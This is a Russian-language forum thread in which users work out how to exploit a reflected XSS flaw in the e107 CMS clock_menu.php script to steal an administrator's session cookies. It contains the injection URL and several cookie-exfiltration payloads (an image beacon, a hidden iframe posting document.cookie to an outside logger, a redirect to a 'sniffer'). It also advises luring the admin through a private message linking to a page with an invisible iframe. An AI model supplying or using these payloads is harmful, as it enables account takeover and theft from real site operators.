Тако сабж...

Есть уязвимость в движке е107
clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22);//--%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Собсна проблема в том, что не знаю как сделать так чтобы, это все подсунуть админу, и чтобы его куки выскочили не в окне, а сохранились где-то на моем хосте в лог файлах...в этом роде...

З.Ы если есть другие варианты подскажите пожалуйста... а то уже 2-ую неделю мучаюсь

Заранее спасибо

Эм....тут чуток разобрался...запустил снифер....Но снифер только на форум..на сайт никак...везде права на все урезаны...как мне через активную xSS можно сделать...Люди, помогите пожалуйста.

сделай страничку на каком нибудь фрихосте, на странице сделай нивидимый фрейм на хсс, админу в личку отправь месачь с сылкой на эту страницу

Собствеено делаю....

Вот
<script>img = new Image(); img.src = "http://na-s.ru/images/image_1.gif?"+document.cookie; // код кражи куки // редирект через 3 сек. var URL = "http://image.ru/image.jpg" // адрес картинки var speed = 3000 function reload() { document.location = URL } setTimeout("reload()", speed); </script>
Но не работает( как ни старался... проверял на своем хосте...

А используя

document.write('<iframe width=1 height=1 style="position: absolute; visibility: hidden;" src="'+'http://xss.host.ru/xss.php'+'?['+location.host+']:'+document.cookie+'"></iframe>');

используя ява скрипт он должен открывать в принципе фрейм и сохранять куки вот здесь http://xss.host.ru/cookies

Но после всех проделанных действий ни куки ничего...

З.Ы. хост поддерживает и выполнение ява скриптов и пхп

у кукисов наверно ограниченная зона действия.
по дефолту у всех / стоит, но можно выбрать и другую диру

попробуй так
<html>
тут какой нибуть флуд для админа

<iframe width=21 height=11 style="position: absolute; visibility: hidden;" src="http://жертва/clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22);//--><script>document.location='http://тутснифер/?'+document.cookie+;</script>"></iframe>
</html>